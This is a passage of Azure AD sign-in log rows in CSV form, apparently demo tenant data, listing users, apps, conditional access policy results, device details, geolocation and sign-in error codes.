'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+364,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,54:53.0,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,cf9b0a39-2187-4aa7-a008-ca36b875c3b8,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 14:54,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",724252ea-eeaa-47d5-808a-7afefdc51600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],{'errorCode': 0},CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,724252ea-eeaa-47d5-808a-7afefdc51600,SigninLogs,Sucess,35.01296997,-80.93171692
+365,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+366,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:51.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,b2831697-435a-470d-83f3-8fe628015eb0,Microsoft.aadiam,Microsoft.aadiam,,PC Admin,4,IL,Graph explorer,de8bc8b5-d9f9-48b1-a8ad-b748da725064,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,09/04/2020 15:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'b50c9774-c742-4b80-8769-ecd14859e7c3', 'browser': 'Chrome 80.0.3987', 'displayName': 'yanivsh-su', 'trustType': 'Azure AD registered'}",427050f6-7c42-4813-a7f4-3e3b3cc05600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 34.85319900512695, 'latitude': 32.32146072387695}, 'state': 'Hamerkaz', 'city': 'Netanya'}",none,none,none,none,[],{'errorCode': 0},PC Admin,95289cbf-4ab6-46f3-804b-c9a6f2ef1227,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Microsoft Graph,427050f6-7c42-4813-a7f4-3e3b3cc05600,SigninLogs,Sucess,32.32146072,34.85319901
+367,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,05:36.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:05,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",77c67fc7-1075-45f8-a369-a7b3046f7500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,77c67fc7-1075-45f8-a369-a7b3046f7500,SigninLogs,Sucess,38.47222137,-77.41989899
+368,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,16:50.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,c771ca39-07ac-4ee5-8316-480ede22a678,Microsoft.aadiam,Microsoft.aadiam,,Nicholas DiCola (SECURITY JEDI),4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 16:16,"{'operatingSystem': 'Windows 10', 'deviceId': '51dc4855-d402-41ae-85fc-32714f2b813b', 'browser': 'Edge 81.0.416', 'displayName': 'ndicola-sl3', 'trustType': 'Azure AD joined', 'isCompliant': True, 'isManaged': True}",b99c73a2-3a55-4cd2-b316-bff8f4411e00,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -77.4198989868164, 'latitude': 38.47222137451172}, 'state': 'Virginia', 'city': 'Stafford'}",none,none,none,none,[],{'errorCode': 0},Nicholas DiCola (SECURITY JEDI),142512c7-f006-46ae-909c-14fa7bf6a887,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,b99c73a2-3a55-4cd2-b316-bff8f4411e00,SigninLogs,Sucess,38.47222137,-77.41989899
+369,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,56:33.2,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50126,None,Invalid username or password or Invalid on-premise username or password.,0,fb4a9b3e-f556-431c-9d15-aa35c40c89df,Microsoft.aadiam,Microsoft.aadiam,,CBServiceAccount,4,US,Azure Active Directory PowerShell,1b730954-1685-4b74-9bfd-dac224a7b894,Mobile Apps and Desktop clients,[],notApplied,09/04/2020 14:56,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'IE 7.0'}",6ab139a2-776a-491f-a231-a575d79f1800,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -80.93171691894531, 'latitude': 35.012969970703125}, 'state': 'South Carolina', 'city': 'Fort Mill'}",none,none,none,none,[],"{'errorCode': 50126, 'failureReason': 'Invalid username or password or Invalid on-premise username or password.'}",CBServiceAccount,ba008280-608e-4a2d-b693-19957e50c691,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,6ab139a2-776a-491f-a231-a575d79f1800,SigninLogs,Failed,35.01296997,-80.93171692
+370,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:17.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,50140,None,This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",success,09/04/2020 16:17,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",7b8d94b8-c096-4787-a5e7-93d364fd1700,,,"{'countryOrRegion': 'BE', 'geoCoordinates': {'longitude': 5.572050094604492, 'latitude': 50.64065170288086}, 'state': 'Liege', 'city': 'Liege'}",none,none,none,none,[],"{'errorCode': 50140, 'failureReason': ""This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."", 'additionalDetails': 'MFA completed in Azure AD'}",Admin,bdb72692-2275-412b-8af0-ea21c2ebd174,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,7b8d94b8-c096-4787-a5e7-93d364fd1700,SigninLogs,Failed,50.6406517,5.572050095
+371,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,26:03.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0abce4fa-6943-4552-88eb-390b37429bbe,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,09/04/2020 16:26,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",028ee73f-e71d-464b-b4fd-9db2cc2e1900,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,028ee73f-e71d-464b-b4fd-9db2cc2e1900,SigninLogs,Sucess,33.7984581,-84.38828278
+372,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,17:24.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,39182242-cde6-4137-81a5-e52b32a39c54,Microsoft.aadiam,Microsoft.aadiam,,Admin,4,BE,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 3, 'displayName': 'Semolen - Admin MFA', 'result': 'success', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 